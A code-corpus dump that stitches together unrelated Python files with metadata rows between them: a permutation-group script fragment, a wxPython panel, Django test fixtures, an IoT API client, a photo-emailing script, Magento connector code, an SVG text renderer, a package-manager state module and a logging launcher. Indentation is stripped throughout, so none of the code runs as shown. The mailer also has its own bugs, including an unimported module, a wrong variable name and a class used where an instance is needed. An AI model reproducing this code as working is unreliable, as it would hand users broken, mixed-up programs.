adz = all_asw_decomp(z)
l = len(adz[0])
k = random.randint(1,l-1) #in [1,l-1]
#k generators from (y-x) and l-k generators from (x-y)
dict1 = {}
dict2 = {}
for d in adz:
zz = x
for i in range(k):
zz = dot(zz,asw(d[i]))
sz = perm2str(zz)
if sz in dict1:
dict1[sz] += 1
else:
dict1[sz] = 1
ww = y
drev = rev(d)
for i in range(l-k):
ww = dot(ww,asw(drev[i]))
sw = perm2str(ww)
if sw in dict2:
dict2[sw] += 1
else:
dict2[sw] = 1
if dict1!=dict2:
return False;
return True
#init the environment and print usage
init()
#test()
help()
| gpl-2.0 | -3,328,842,759,987,136,500 | 22.886199 | 158 | 0.570393 | false |
RobinQuetin/CAIRIS-web | cairis/cairis/WeaknessAnalysisPanel.py | 1 | 1665 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import wx
import armid
from BasePanel import BasePanel
import Asset
from WeaknessAnalysisNotebook import WeaknessAnalysisNotebook
class WeaknessAnalysisPanel(BasePanel):
def __init__(self,parent,cvName,envName):
BasePanel.__init__(self,parent,armid.WEAKNESSANALYSIS_ID)
self.theAssetId = None
mainSizer = wx.BoxSizer(wx.VERTICAL)
nbBox = wx.StaticBox(self,-1)
nbSizer = wx.StaticBoxSizer(nbBox,wx.VERTICAL)
mainSizer.Add(nbSizer,1,wx.EXPAND)
nbSizer.Add(WeaknessAnalysisNotebook(self,cvName,envName),1,wx.EXPAND)
buttonSizer = wx.BoxSizer(wx.HORIZONTAL)
applyButton = wx.Button(self,armid.WEAKNESSANALYSIS_BUTTONCOMMIT_ID,"Apply")
buttonSizer.Add(applyButton)
closeButton = wx.Button(self,wx.ID_CANCEL,"Cancel")
buttonSizer.Add(closeButton)
mainSizer.Add(buttonSizer,0,wx.CENTER)
self.SetSizer(mainSizer)
| apache-2.0 | -8,500,019,050,988,761,000 | 38.642857 | 80 | 0.76036 | false |
datamade/django-councilmatic | tests/conftest.py | 1 | 4072 | import pytest
from pytest_django.fixtures import db
from uuid import uuid4
from django.core.management import call_command
from django.db import connection
from councilmatic_core.models import Bill, BillDocument, Event, EventDocument
@pytest.fixture
@pytest.mark.django_db
def organizations(db):
call_command('loaddata', 'tests/fixtures/organization.json')
@pytest.fixture
@pytest.mark.django_db
def bills(db):
call_command('loaddata', 'tests/fixtures/bill.json')
@pytest.fixture
@pytest.mark.django_db
def people(db):
call_command('loaddata', 'tests/fixtures/person.json')
@pytest.fixture
@pytest.mark.django_db
def events(db):
call_command('loaddata', 'tests/fixtures/event.json')
@pytest.fixture
@pytest.mark.django_db
def metro_bill(db):
bill_info = {
'ocd_id': 'ocd-bill/8ad8fe5a-59a0-4e06-88bd-58d6d0e5ef1a',
'description': 'CONSIDER: A. AUTHORIZING the CEO to execute Modification No. 2 to Contract C1153, Advanced Utility Relocations (Westwood/UCLA Station), with Steve Bubalo Construction Company for supply and installation of equipment for a traffic Video Detection System (VDS) required by Los Angeles Department of Transportation (LADOT), in the amount of $567,554, increasing the total contract value from $11,439,000 to $12,006,554; and B. APPROVING an increase in Contract Modification Authority (CMA) to Contract C1153, Advanced Utility Relocations (Westwood/UCLA Station), increasing the current CMA from $1,143,900 to $2,287,800.',
'identifier': '2018-0285',
'ocd_created_at': '2017-01-16 15:00:30.329048-06',
'ocd_updated_at': '2017-01-16 15:00:30.329048-06',
'updated_at': '2017-01-16 15:00:30.329048-06',
}
bill = Bill.objects.create(**bill_info)
return bill
@pytest.fixture
@pytest.mark.django_db
def metro_event(db):
event_info = {
'ocd_id': 'ocd-event/17fdaaa3-0aba-4df0-9893-2c2e8e94d18d',
'ocd_created_at': '2017-05-27 11:10:46.574-05',
'ocd_updated_at': '2017-05-27 11:10:46.574-05',
'name': 'System Safety, Security and Operations Committee',
'start_time': '2017-05-18 12:15:00-05',
'updated_at': '2017-05-17 11:06:47.1853',
'slug': uuid4(),
}
event = Event.objects.create(**event_info)
return event
@pytest.fixture
@pytest.mark.django_db
def metro_bill_document(metro_bill, db):
document_info = {
'bill_id': metro_bill.ocd_id,
'document_type': 'V',
'updated_at': '2017-02-16 15:00:30.329048-06',
'full_text': '',
'note': 'Board Report',
'url': 'https://metro.legistar.com/ViewReport.ashx?M=R&N=TextL5&GID=557&ID=5016&GUID=LATEST&Title=Board+Report',
}
document = BillDocument.objects.create(**document_info)
return document
@pytest.fixture
@pytest.mark.django_db
def metro_event_document(metro_event, db):
document_info = {
'event_id': metro_event.ocd_id,
'updated_at': '2017-05-27 11:10:46.574-05',
'full_text': '',
'note': 'Agenda',
'url': 'http://metro.legistar1.com/metro/meetings/2017/5/1216_A_System_Safety,_Security_and_Operations_Committee_17-05-18_Agenda.pdf',
}
document = EventDocument.objects.create(**document_info)
return document
@pytest.fixture
@pytest.mark.django_db
def metro_change_bill(metro_bill, db):
with connection.cursor() as cursor:
sql = '''
CREATE TABLE change_bill (
ocd_id VARCHAR,
PRIMARY KEY (ocd_id)
);
INSERT INTO change_bill (ocd_id)
VALUES ('{}');
'''.format(metro_bill.ocd_id)
cursor.execute(sql)
@pytest.fixture
@pytest.mark.django_db
def metro_change_event(metro_event, db):
with connection.cursor() as cursor:
sql = '''
CREATE TABLE change_event (
ocd_id VARCHAR,
PRIMARY KEY (ocd_id)
);
INSERT INTO change_event (ocd_id)
VALUES ('{}');
'''.format(metro_event.ocd_id)
cursor.execute(sql)
| mit | -3,183,727,234,289,889,300 | 32.377049 | 643 | 0.649558 | false |
gizwits/gservice_sdk_py | gservice/api/client.py | 1 | 1504 | #coding:utf-8
'''
moduls::APIClient
~~~~~~~~~~~~~~~~~
request handler
'''
import requests
import json
from ..calls.g_login import login as login_call
class APIClient(object):
def __init__(self):
self.session = requests.Session()
self.token = None
self.uid = None
self.expire_at = None
self.headers = {"Content-Type": "application/json"}
def set_token(self, token):
'''Set token manually to avoid having to login repeatedly'''
self.token = token
self.headers["X-Gizwits-User-token"] = self.token
def login(self, acc, pwd):
'''login to gservice
'''
r = self.send_request(login_call(acc, pwd))
self.set_token(r['token'])
self.uid = r['uid']
self.expire_at = r['expire_at']
def send_request(self, request, timeout=30):
'''
:param request: A prepared Request object for the request.
:type request_method: Request
:param timeout: Timeout duration in seconds.
:type timeout: int
:returns: dict
'''
request.headers = self.headers
# Include the session headers in the request
request.headers.update(self.session.headers)
if request.data == []:
# let the body clean.
# request.data = json.dumps({})
pass
else:
request.data = json.dumps(request.data)
r = self.session.send(request.prepare(), timeout=timeout)
return r
| mit | 4,340,423,305,111,544,300 | 26.345455 | 68 | 0.577128 | false |
hugoShaka/photo-mailer | mailerv2.py | 1 | 5032 | # -*- coding: utf-8 -*-
import getpass
import sys, os
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.image import MIMEImage
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
from iptcinfo import IPTCInfo
import logging
logging.basicConfig(filename='error.log')
class photo:
"""A photo can be sent, it also contains the recipient's email address"""
def __init__(self,fileloc):
self.location=fileloc
try:
self.info=IPTCInfo(self.location)
self.addr=str(self.info.data['object name'])
self.IPTCred=True
except Exception:
print(fileloc+" No valid IPTC tags found.")
self.IPTCred=False
def generateEmail(self,mailaccount,message):
if self.addr=='':
self.email=None
print("Warning no valid email address for : "+self.location)
else:
self.email=mail(self.addr,self.location,mailaccount,message)
self.sent=False
def send(self):
if self.sent:
print('Warning :Re-sending the email')
self.email.send()
self.sent=True
class folder:
"""Contains the path to the photos. Can be scanned to get the photos and can be used to mass edit/send the mails/the photos"""
def __init__(self,pathtofolder):
self.path=pathtofolder
self.files=[]
def scan(self):
howManyImport=0
for root, dirs, files in os.walk(self.path):
for file in files:
if file.endswith(".jpg"):
importedPhoto=photo(os.path.join(root, file))
if importedPhoto.IPTCred:
self.files.append(importedPhoto)
howManyImport+=1
print(str(howManyImport) + " files were sucessfully imported")
def generateEmails(self,mailaccount,message):
for pic in self.files:
pic.generateEmail(mailaccount,message)
class mailaccount:
"""Compte mail et parametres de connexion au serveur
"""
def __init__(self):
self.sender="Club Photo"
self.port="587"
self.smtp="smtp.rez-gif.supelec.fr"
self.login="None"
self.connected=False
def credentials(self):
self.login=raw_input("Login : ")
self.pwd=getpass.getpass("Mot de passe : \n")
def showMailSettings(self):
print("\n--------------------\n MailServer Settings \n--------------------\n")
print("sender : "+self.sender+"\nsmtp server : "+self.smtp+"\nport : "+self.port+"\nlogin : ")
if not self.connected:
print("Status : not connected")
else:
print("Status : connected as : "+self.login)
def editMailSettings(self):
self.sender=raw_input("sender ?")
self.smtp=raw_input("server ?")
self.port=raw_input("port?")
def log(self):
try:
self.mailserver=smtplib.SMTP(self.smtp,self.port)
self.mailserver.ehlo()
self.mailserver.starttls()
self.mailserver.ehlo()
self.mailserver.login(self.login,self.pwd)
self.connected=True
except (socket.error) as err:
print("Socket error:.({0}): {1}".format(e.errno, e.strerror))
self.connected=False
def unlog(self):
self.mailserver.quit()
self.connected=False
class mail:
"""Objet mail qui possède les methodes pour etre envoye, recupere ses parametres d'un objet mailaccount"""
def __init__(self,reciever,photo,mailaccount,message):
if reciever==None:
print("\n /!\ Email not created due to invalid email address")
else:
self.msg=MIMEMultipart()
self.msg['From'] = mailaccount.sender
self.msg['To'] = reciever
self.msg['Subject'] = message.subject
self.msg.attach(MIMEText(message.generate()))
pj=open(photo, 'rb')
self.msg.attach(MIMEApplication(pj.read(),Content_Disposition='attachement;filename="%s"' % os.path.basename(photo),Name=os.path.basename(photo)))
pj.close()
print("Mail to : "+reciever+" successfully generated")
def send(self):
"""Send the mail object"""
if (mailaccount.connected):
mailaccount.mailserver.sendmail(mailaccount.sender, self.msg['To'], self.msg.as_string())
else :
mailaccount.log()
mailaccount.mailserver.sendmail(mailaccount.sender, self.msg['To'], self.msg.as_string())
class message:
"""A class to manage the e-mail text"""
def __init__(self,text='No text'):
self.text=text
self.sign=''
self.subject='Your photo'
def generate(self):
return self.text+'\n-- \n'+self.sign
def main():
print("Not yet")
mailacc=mailaccount()
mailacc.showMailSettings()
if (raw_input("\nEdit mail server settings ? (y/N)")=='y'):
mailacc.editMailSettings()
print("Please enter your credentials")
mailacc.credentials()
print("Testing the settings")
mailacc.log()
if mailacc.connected:
print("\nSuccessfully logged :) \n")
else:
print("Exiting")
pathto=raw_input("Choose your folder")
currentFolder=folder('/home/shaka/Downloads/photos/')
currentFolder.scan()
currentMessage=message()
currentMessage.text=raw_input("enter the email's body text")
currentFolder.generateEmails(mailacc,currentMessage)
main()
| apache-2.0 | -2,709,665,014,651,973,000 | 30.248447 | 152 | 0.667661 | false |
akretion/connector-magento | magentoerpconnect_catalog/product.py | 1 | 15502 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright 2013
# Author: Guewen Baconnier - Camptocamp SA
# Augustin Cisterne-Kaasv - Elico-corp
# David Béal - Akretion
# Chafique Delli - Akretion
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, orm
from openerp.addons.connector.unit.mapper import (mapping,
ExportMapper)
from openerp.addons.magentoerpconnect.unit.delete_synchronizer import (
MagentoDeleteSynchronizer)
from openerp.addons.magentoerpconnect.unit.export_synchronizer import (
MagentoTranslationExporter)
from openerp.addons.magentoerpconnect.backend import magento
from openerp.addons.connector.exception import MappingError
from openerp.addons.magentoerpconnect.unit.export_synchronizer import (
export_record
)
import openerp.addons.magentoerpconnect.consumer as magentoerpconnect
from openerp.addons.connector.event import on_record_write
from openerp.addons.connector.connector import ConnectorUnit
from openerp.tools.translate import _
import logging
_logger = logging.getLogger(__name__)
class MagentoProductProduct(orm.Model):
_inherit = 'magento.product.product'
_columns = {
'active': fields.boolean(
'Active',
help=("When a binding is unactivated, the product is delete from "
"Magento. This allow to remove product from Magento and so "
"to increase the perf on Magento side")),
}
#Automatically create the magento binding for each image
def create(self, cr, uid, vals, context=None):
mag_image_obj = self.pool['magento.product.image']
mag_product_id = super(MagentoProductProduct, self).\
create(cr, uid, vals, context=context)
mag_product = self.browse(cr, uid, mag_product_id, context=context)
if mag_product.backend_id.auto_bind_image:
for image in mag_product.image_ids:
mag_image_obj.create(cr, uid, {
'openerp_id': image.id,
'backend_id': mag_product.backend_id.id,
}, context=context)
return mag_product_id
def write(self, cr, uid, ids, vals, context=None):
if vals.get('active') is True:
binding_ids = self.search(cr, uid, [
('active', '=', False),
], context=context)
if len(binding_ids) > 0:
raise orm.except_orm(
_('User Error'),
_('You can not reactivate the following binding ids: %s '
'please add a new one instead') % binding_ids)
return super(MagentoProductProduct, self).\
write(cr, uid, ids, vals, context=context)
def unlink(self, cr, uid, ids, context=None):
synchronized_binding_ids = self.search(cr, uid, [
('id', 'in', ids),
('magento_id', '!=', False),
], context=context)
if synchronized_binding_ids:
raise orm.except_orm(
_('User Error'),
_('This binding ids %s can not be remove as '
'the field magento_id is not empty.\n'
'Please unactivate it instead'))
return super(MagentoProductProduct, self).unlink(
cr, uid, ids, context=context)
_defaults = {
'active': True,
}
class ProductProduct(orm.Model):
_inherit = 'product.product'
_columns = {
'magento_inactive_bind_ids': fields.one2many(
'magento.product.product',
'openerp_id',
domain=[('active', '=', False)],
readonly=True,
string='Magento Bindings',),
}
def _prepare_create_magento_auto_binding(self, cr, uid, product,
backend_id, context=None):
return {
'backend_id': backend_id,
'openerp_id': product.id,
'visibility': '4',
'status': '1',
}
def _get_magento_binding(self, cr, uid, product_id, backend_id, context=None):
binding_ids = self.pool['magento.product.product'].search(cr, uid, [
('openerp_id', '=', product_id),
('backend_id', '=', backend_id),
], context=context)
if binding_ids:
return binding_ids[0]
else:
return None
def automatic_binding(self, cr, uid, ids, sale_ok, context=None):
backend_obj = self.pool['magento.backend']
mag_product_obj = self.pool['magento.product.product']
back_ids = backend_obj.search(cr, uid, [], context=context)
products = self.browse(cr, uid, ids, context=context)
for backend in backend_obj.browse(cr, uid, back_ids, context=context):
if backend.auto_bind_product:
for product in products:
binding_id = self._get_magento_binding(
cr, uid, product.id, backend.id, context=context)
if not binding_id and sale_ok:
vals = self._prepare_create_magento_auto_binding(
cr, uid, product, backend.id, context=context)
mag_product_obj.create(cr, uid, vals, context=context)
else:
mag_product_obj.write(cr, uid, binding_id, {
'status': '1' if sale_ok else '2',
}, context=context)
def write(self, cr, uid, ids, vals, context=None):
super(ProductProduct, self).write(cr, uid, ids, vals, context=context)
if vals.get('active', True) is False:
for product in self.browse(cr, uid, ids, context=context):
for bind in product.magento_bind_ids:
bind.write({'active': False})
if 'sale_ok' in vals:
self.automatic_binding(cr, uid, ids, vals['sale_ok'], context=context)
return True
def create(self, cr, uid, vals, context=None):
product_id = super(ProductProduct, self).create(
cr, uid, vals, context=context)
product = self.browse(cr, uid, product_id, context=context)
if product.sale_ok:
self.automatic_binding(cr, uid, [product.id], True, context=context)
return product_id
def _check_uniq_magento_product(self, cr, uid, ids):
cr.execute("""SELECT openerp_id
FROM magento_product_product
WHERE active=True
GROUP BY backend_id, openerp_id
HAVING count(id) > 1""")
result = cr.fetchall()
if result:
raise orm.except_orm(
_('User Error'),
_('You can not have more than one active binding for '
'a product. Here is the list of product ids with a '
'duplicated binding : %s')
% ", ".join([str(x[0]) for x in result]))
return True
_constraints = [(
_check_uniq_magento_product,
'Only one binding can be active',
['backend_id', 'openerp_id', 'active'],
)]
@on_record_write(model_names=[
'magento.product.product',
])
def delay_export(session, model_name, record_id, vals=None):
if vals.get('active', True) == False:
magentoerpconnect.delay_unlink(session, model_name, record_id)
@magento
class ProductProductDeleteSynchronizer(MagentoDeleteSynchronizer):
""" Partner deleter for Magento """
_model_name = ['magento.product.product']
@magento
class ProductProductConfigurableExport(ConnectorUnit):
_model_name = ['magento.product.product']
def _export_configurable_link(self, binding):
""" Export the link for the configurable product"""
return
@magento
class ProductProductExporter(MagentoTranslationExporter):
_model_name = ['magento.product.product']
@property
def mapper(self):
if self._mapper is None:
self._mapper = self.get_connector_unit_for_model(
ProductProductExportMapper)
return self._mapper
def _should_import(self):
"""Product are only edited on OpenERP Side"""
return False
def _create(self, data):
""" Create the Magento record """
# special check on data before export
sku = data.pop('sku')
attr_set_id = data.pop('attrset')
product_type = data.pop('product_type')
self._validate_data(data)
return self.backend_adapter.create(product_type, attr_set_id, sku, data)
def _export_dependencies(self):
""" Export the dependencies for the product"""
#TODO add export of category
attribute_binder = self.get_binder_for_model('magento.product.attribute')
option_binder = self.get_binder_for_model('magento.attribute.option')
record = self.binding_record
for group in record.attribute_group_ids:
for attribute in group.attribute_ids:
attribute_ext_id = attribute_binder.to_backend(
attribute.attribute_id.id, wrap=True)
if attribute_ext_id:
options = []
if attribute.ttype == 'many2one' and record[attribute.name]:
options = [record[attribute.name]]
elif attribute.ttype == 'many2many':
options = record[attribute.name]
for option in options:
if not option_binder.to_backend(option.id, wrap=True):
ctx = self.session.context.copy()
ctx['connector_no_export'] = True
binding_id = self.session.pool['magento.attribute.option'].create(
self.session.cr, self.session.uid, {
'backend_id': self.backend_record.id,
'openerp_id': option.id,
'name': option.name,
}, context=ctx)
export_record(self.session, 'magento.attribute.option', binding_id)
def _after_export(self):
""" Export the link for the configurable product"""
binding = self.binding_record
if binding.is_display:
configurable_exporter = self.environment.get_connector_unit(ProductProductConfigurableExport)
configurable_exporter._export_configurable_link(binding)
@magento
class ProductProductExportMapper(ExportMapper):
_model_name = 'magento.product.product'
#TODO FIXME
# direct = [('name', 'name'),
# ('description', 'description'),
# ('weight', 'weight'),
# ('list_price', 'price'),
# ('description_sale', 'short_description'),
# ('default_code', 'sku'),
# ('product_type', 'type'),
# ('created_at', 'created_at'),
# ('updated_at', 'updated_at'),
# ('status', 'status'),
# ('visibility', 'visibility'),
# ('product_type', 'product_type')
# ]
@mapping
def all(self, record):
return {'name': record.name,
'description': record.description,
'weight': record.weight,
'price': record.lst_price,
'short_description': record.description_sale,
'type': record.product_type,
'created_at': record.created_at,
#'updated_at': record.updated_at,
'status': record.status,
'visibility': record.visibility,
'product_type': record.product_type }
@mapping
def sku(self, record):
sku = record.default_code
if not sku:
raise MappingError("The product attribute default code cannot be empty.")
return {'sku': sku}
@mapping
def set(self, record):
binder = self.get_binder_for_model('magento.attribute.set')
set_id = binder.to_backend(record.attribute_set_id.id, wrap=True)
return {'attrset': set_id}
@mapping
def updated_at(self, record):
updated_at = record.updated_at
if not updated_at:
updated_at = '1970-01-01'
return {'updated_at': updated_at}
@mapping
def website_ids(self, record):
website_ids = []
for website_id in record.website_ids:
magento_id = website_id.magento_id
website_ids.append(magento_id)
return {'website_ids': website_ids}
@mapping
def category(self, record):
categ_ids = []
if record.categ_id:
for m_categ in record.categ_id.magento_bind_ids:
if m_categ.backend_id.id == self.backend_record.id:
categ_ids.append(m_categ.magento_id)
for categ in record.categ_ids:
for m_categ in categ.magento_bind_ids:
if m_categ.backend_id.id == self.backend_record.id:
categ_ids.append(m_categ.magento_id)
return {'categories': categ_ids}
@mapping
def get_product_attribute_option(self, record):
result = {}
option_binder = self.get_binder_for_model('magento.attribute.option')
for group in record.attribute_group_ids:
for attribute in group.attribute_ids:
magento_attribute = None
#TODO maybe adding a get_bind function can be better
for bind in attribute.magento_bind_ids:
if bind.backend_id.id == self.backend_record.id:
magento_attribute = bind
if not magento_attribute:
continue
if attribute.ttype == 'many2one':
option = record[attribute.name]
if option:
result[magento_attribute.attribute_code] = \
option_binder.to_backend(option.id, wrap=True)
else:
result[magento_attribute.attribute_code] = False
elif attribute.ttype == 'many2many':
options = record[attribute.name]
if options:
result[magento_attribute.attribute_code] = \
[option_binder.to_backend(option.id, wrap=True) for option in options]
else:
result[magento_attribute.attribute_code] = False
else:
#TODO add support of lang
result[magento_attribute.attribute_code] = record[attribute.name]
return result
| agpl-3.0 | -2,681,854,512,350,137,300 | 39.685039 | 105 | 0.562802 | false |
CWBudde/Ink2SmartCanvas | Ink2SmartCanvas/svg/Text.py | 1 | 1318 | from ink2canvas.svg.AbstractShape import AbstractShape
class Text(AbstractShape):
def textHelper(self, tspan):
val = ""
if tspan.text:
val += tspan.text
for ts in tspan:
val += self.textHelper(ts)
if tspan.tail:
val += tspan.tail
return val
def setTextStyle(self, style):
keys = ("font-style", "font-weight", "font-size", "font-family")
text = []
for key in keys:
if key in style:
text.append(style[key])
self.canvasContext.setFont(" ".join(text))
def getData(self):
x = self.attr("x")
y = self.attr("y")
return x, y
def draw(self, isClip=False):
x, y = self.getData()
style = self.getStyle()
if self.hasTransform():
transMatrix = self.getTransform()
self.canvasContext.transform(*transMatrix) # unpacks argument list
self.setStyle(style)
self.setTextStyle(style)
for tspan in self.node:
text = self.textHelper(tspan)
_x = float(tspan.get("x"))
_y = float(tspan.get("y"))
self.canvasContext.fillText(text, _x, _y)
self.gradientHelper.setGradientFill()
self.gradientHelper.setGradientStroke()
| gpl-2.0 | -2,483,348,612,490,102,300 | 29.651163 | 78 | 0.552352 | false |
PisiLinux-PyQt5Port/package-manager | src/statemanager.py | 1 | 10398 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2009-2010, TUBITAK/UEKAE
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# Please read the COPYING file.
#
from PyQt5.QtCore import QObject
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtWidgets import QMessageBox
import config
if config.USE_APPINFO:
from appinfo.client import AppInfoClient
import backend
from pmutils import *
from pmlogging import logger
class StateManager(QObject):
(ALL, INSTALL, REMOVE, UPGRADE, HISTORY) = range(5)
def __init__(self, parent=None):
QObject.__init__(self)
self.state = self.ALL
self._group_cache = {}
self.iface = backend.pm.Iface()
self.reset()
def reset(self):
self.cached_packages = None
self._typeCaches = {}
self._typeFilter = 'normal'
self.initializePackageLists()
def initializePackageLists(self):
self.__groups = self.iface.getGroups()
self.__installed_packages = self.iface.getInstalledPackages()
self.__new_packages = self.iface.getNewPackages()
self.__all_packages = self.__installed_packages + self.__new_packages
repositoriesChanged = pyqtSignal()
def setState(self, state):
self.state = state
self.reset()
self.repositoriesChanged.emit()
def getState(self):
return self.state
def packages(self):
if self.cached_packages == None:
if self.state == self.UPGRADE:
self.cached_packages = self.iface.getUpdates()
self._typeCaches = {}
else:
if self.state == self.REMOVE:
self.cached_packages = self.__installed_packages
elif self.state == self.INSTALL:
self.cached_packages = self.__new_packages
else:
self.cached_packages = self.__all_packages
if self.onlyGuiInState():
self.cached_packages = set(self.cached_packages).intersection(self.iface.getIsaPackages("app:gui"))
if not self._typeFilter == 'normal' and self.state == self.UPGRADE:
if not self._typeCaches.has_key(self._typeFilter):
self._typeCaches[self._typeFilter] = self.iface.filterUpdates(self.cached_packages, self._typeFilter)
return self._typeCaches[self._typeFilter]
return list(self.cached_packages)
def onlyGuiInState(self):
return config.PMConfig().showOnlyGuiApp()
def setCachedPackages(self, packages):
self.cached_packages = packages
def getActionCurrent(self, action):
return {"System.Manager.installPackage":self.tr("Installing Package(s)"),
"System.Manager.reinstallPackage":self.tr("Installing Package(s)"),
"System.Manager.removePackage":self.tr("Removing Package(s)"),
"System.Manager.updatePackage":self.tr("Upgrading Package(s)"),
"System.Manager.setRepositories":self.tr("Applying Repository Changes"),
"System.Manager.updateRepository":self.tr("Updating Repository"),
"System.Manager.updateAllRepositories":self.tr("Updating Repository(s)")}[str(action)]
def toBe(self):
return {self.INSTALL:self.tr("installed"),
self.REMOVE :self.tr("removed"),
self.UPGRADE:self.tr("upgraded"),
self.ALL :self.tr("modified")}[self.state]
def getActionName(self, state = None):
state = self.state if state == None else state
return {self.INSTALL:self.tr("Install Package(s)"),
self.REMOVE :self.tr("Remove Package(s)"),
self.UPGRADE:self.tr("Upgrade Package(s)"),
self.ALL :self.tr("Select Operation")}[state]
def getActionIcon(self, state = None):
state = self.state if state == None else state
return {self.INSTALL:KIcon(("list-add", "add")),
self.REMOVE :KIcon(("list-remove", "remove")),
self.UPGRADE:KIcon(("system-software-update", "gear")),
self.ALL :KIcon("preferences-other")}[state]
def getSummaryInfo(self, total):
return {self.INSTALL:self.tr("%1 new package(s) have been installed succesfully.", total),
self.REMOVE :self.tr("%1 package(s) have been removed succesfully.", total),
self.UPGRADE:self.tr("%1 package(s) have been upgraded succesfully.", total),
self.ALL :self.tr("%1 package(s) have been modified succesfully.", total)}[self.state]
def getBasketInfo(self):
return {self.INSTALL:self.tr("You have selected the following package(s) to install:"),
self.REMOVE :self.tr("You have selected the following package(s) to removal:"),
self.UPGRADE:self.tr("You have selected the following package(s) to upgrade:"),
self.ALL :self.tr("You have selected the following package(s) to modify:")}[self.state]
def getBasketExtrasInfo(self):
return {self.INSTALL:self.tr("Extra dependencies of the selected package(s) that are also going to be installed:"),
self.REMOVE :self.tr("Reverse dependencies of the selected package(s) that are also going to be removed:"),
self.UPGRADE:self.tr("Extra dependencies of the selected package(s) that are also going to be upgraded:"),
self.ALL :self.tr("Extra dependencies of the selected package(s) that are also going to be modified:")}[self.state]
def groups(self):
return self.__groups
def groupPackages(self, name):
if name == "all":
return self.packages()
else:
if self._group_cache.has_key(name):
group_packages = self._group_cache[name]
else:
group_packages = self.iface.getGroupPackages(name)
self._group_cache[name] = group_packages
return list(set(self.packages()).intersection(group_packages))
def chainAction(self, operation):
chains = { "System.Manager.setRepositories":lambda:self.repositoriesChanged.emit() }
if chains.has_key(operation):
chains[operation]()
def updateRepoAction(self, silence = False):
if not self.iface.updateRepositories():
if not silence:
self.showFailMessage()
return False
if config.USE_APPINFO:
if network_available():
if not AppInfoClient().checkOutDB()[0]:
AppInfoClient().setServer('http://appinfo.pisilinux.org')
AppInfoClient().checkOutDB()
return True
def statusText(self, packages, packagesSize, extraPackages, extraPackagesSize):
if not packages:
return ''
text = self.tr("Currently there are <b>%1</b> selected package(s) of total <b>%2</b> of size ", packages, packagesSize)
if extraPackages:
if self.state == self.REMOVE:
text += self.tr("with <b>%1</b> reverse dependencies of total <b>%2</b> of size ", extraPackages, extraPackagesSize)
else:
text += self.tr("with <b>%1</b> extra dependencies of total <b>%2</b> of size ", extraPackages, extraPackagesSize)
text += self.tr("in your basket.")
return text
def operationAction(self, packages, silence = False, reinstall = False, connection_required = True):
if connection_required:
if not network_available() and not self.state == self.REMOVE:
if not repos_available(self.iface):
self.showFailMessage()
return False
if not silence and not self.state == self.REMOVE:
if not self.conflictCheckPasses(packages):
return False
if reinstall:
return self.iface.reinstallPackages(packages)
return {self.ALL :self.iface.modifyPackages,
self.INSTALL:self.iface.installPackages,
self.REMOVE :self.iface.removePackages,
self.UPGRADE:self.iface.upgradePackages}[self.state](packages)
def setActionHandler(self, handler):
self.iface.setHandler(handler)
def setExceptionHandler(self, handler):
self.iface.setExceptionHandler(handler)
def conflictCheckPasses(self, packages):
(C, D, pkg_conflicts) = self.iface.getConflicts(packages, self.state)
conflicts_within = list(D)
if conflicts_within:
text = self.tr("Selected packages [%1] are in conflict with each other. These packages can not be installed together.", ", ".join(conflicts_within))
QMessageBox.critical(None, self.tr("Conflict Error"), text, QMessageBox.Ok)
return False
if pkg_conflicts:
text = self.tr("The following packages conflicts:\n")
for pkg in pkg_conflicts.keys():
text += self.tr("%1 conflicts with: [%2]\n", pkg, ", ".join(pkg_conflicts[pkg]))
text += self.tr("\nRemove the conflicting packages from the system?")
return QMessageBox.warning(None, self.tr("Conflict Error"), text, QMessageBox.Yes, QMessageBox.No) == QMessageBox.Yes
return True
def checkUpdateActions(self, packages):
return self.iface.checkUpdateActions(packages)
def checkInstallActions(self, packages):
return filter(lambda x: x in self.__installed_packages, packages)
def checkRemoveActions(self, packages):
important_packages = open(config.DATA_DIR + 'important_packages').read().split('\n')
return list(set(important_packages).intersection(packages))
def inInstall(self):
return self.state == self.INSTALL
def inRemove(self):
return self.state == self.REMOVE
def inUpgrade(self):
return self.state == self.UPGRADE
def showFailMessage(self):
QMessageBox.critical(None,
self.tr("Network Error"),
self.tr("Please check your network connections and try again."),
QMessageBox.Ok)
| gpl-2.0 | 1,623,643,069,164,010,200 | 40.592 | 160 | 0.6181 | false |
rrah/PyLiteCo | __main__.py | 1 | 1670 | """Main launcher for pyliteco.
Author: Robert Walker <[email protected]>
Copyright (C) 2015 Robert Walker
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; version 2.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
import logging
import pyliteco.watchdog
import pyliteco.version
import sys
if __name__ == '__main__':
formatter_string = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
formatter = logging.Formatter(formatter_string)
logging.basicConfig(filename = 'pyliteco.log', format = formatter_string)
root = logging.getLogger()
root.setLevel(logging.NOTSET)
